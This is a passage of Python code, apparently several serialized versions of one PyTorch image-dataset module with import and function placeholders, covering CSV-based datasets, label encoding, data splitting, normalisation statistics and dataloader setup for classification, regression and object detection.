print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n 
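# read the training CSV that was just located or created above\n 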
train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, 
split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n 
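# test-time augmentation was not requested\n 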
tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n 
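# keep references to the label dataframe, transforms, and class-balancing settings\n 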
self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n 
os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\n<function token>\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\n<function token>\n<function token>\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\n<function token>\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n 
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n 
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n 
data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = 
self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample 